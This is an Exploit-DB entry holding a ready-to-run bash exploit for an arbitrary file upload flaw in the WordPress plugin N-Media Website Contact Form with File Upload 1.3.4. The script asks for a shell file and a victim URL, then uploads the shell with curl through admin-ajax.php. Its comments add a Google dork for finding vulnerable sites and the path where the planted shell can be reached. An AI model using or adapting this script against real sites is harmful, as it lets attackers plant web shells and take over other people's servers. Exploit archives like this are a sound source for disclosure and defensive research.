WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)

EDB-ID:

36979

CVE:





Platform:

PHP

Date:

2015-05-11


#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL


echo '
+---------------------------------------------------------------+
|                                                               |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
|                                                               |
+---------------------------------------------------------------+
|                                                               |
|	Script by	   : F17.c0de                           |
|	Vuln Discovered by : Claudio Viviani                    |
|	Date		   : 15.04.2015                         |
|	Google Dork	   : inurl:"/uploads/contact_files/"    |
|	Vulnerability	   : "upload_file()" on admin-ajax.php  |
|	Description	   : Auto shell uploader                |
|                                                               |
+---------------------------------------------------------------+
|                       No System is Safe                       |
+---------------------------------------------------------------+
'

echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo

curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php

echo
echo
echo "Job Finished"
echo